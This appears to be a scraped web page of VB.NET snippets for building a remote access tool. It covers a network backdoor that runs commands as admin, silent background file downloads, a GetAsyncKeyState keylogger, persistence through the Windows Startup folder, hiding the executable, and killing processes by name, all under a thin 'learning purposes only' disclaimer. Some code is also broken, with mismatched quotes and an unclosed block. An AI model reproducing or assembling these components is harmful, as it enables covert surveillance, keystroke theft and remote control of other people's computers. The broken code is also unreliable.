Form Information & Learning Purposed ONLY
.NET Remote Access Tool (R.A.T)
Connects To Another Computer Via Network Backdoor To Execute Commands As Admin
Default Code Opens Message Box But This Line of Code Can Be Changed in Server :
messagebox.show(stri) - To - start.process("stri.tostring") To Run Process, Shell Command or Open Website In Default Browser
You Can Also Download Files in Background Using This Code :
my.computer.network.downloadfile(stri.tostring, "c:\users\ + environment.username.tostring + "\documents")
Keylogger Version 2 - Simple (No Special Keys)
'Add Textbox & Timer To Project & Replace All Code With The Following
Public Class Form1
Dim key As Integer
Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As System.Windows.Forms.Keys) As Short
Private Sub Timer1_Tick(sender As Object, e As EventArgs) Handles Timer1.Tick
For i = 1 To 255
key = 0
key = GetAsyncKeyState(i)
If key = -32767 Then
TextBox1.Text &= Chr(i)
End If
Next i
End Sub
End Class
<-- Includes Active Window Title Capture Feature
Recording Active Widow Titles (opened programs and files + viewed websites)
Gmail,Yahoo And Every Other Email Provider Blocks 3rd Party Send Requests
.NET Adding Program To Windows Startup Folder
Dim FileToCopy1 As String
Dim NewCopy1 As String
FileToCopy1 = "File To Copy Directory Here"
'Directory can be replaced by " Application.ExecutablePath.ToString " to copy this program into startup
NewCopy1 = "C:\Users\" + Environment.UserName.ToString + "\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
If System.IO.File.Exists(FileToCopy1) = True Then
Try
System.IO.File.Copy(FileToCopy1, NewCopy1)
Catch Ex As Exception
msgbox.show("Error")
End Try
.NET Set File Attribute As Hidden File
SetAttr("Application.ExecutablePath.ToString ", vbHidden)
.NET Blocking Program By Name
For Each
proc As Process In Process.GetProcesses
Try If proc.ProcessName = "notepad" Then
'replace notepad with the program you want to close
(Don't Have To Include .EXE Tag )
proc.Kill()
End If
Catch ex As Exception
End Try
Next
If you are the site owner, please renew your premium subscription or contact support.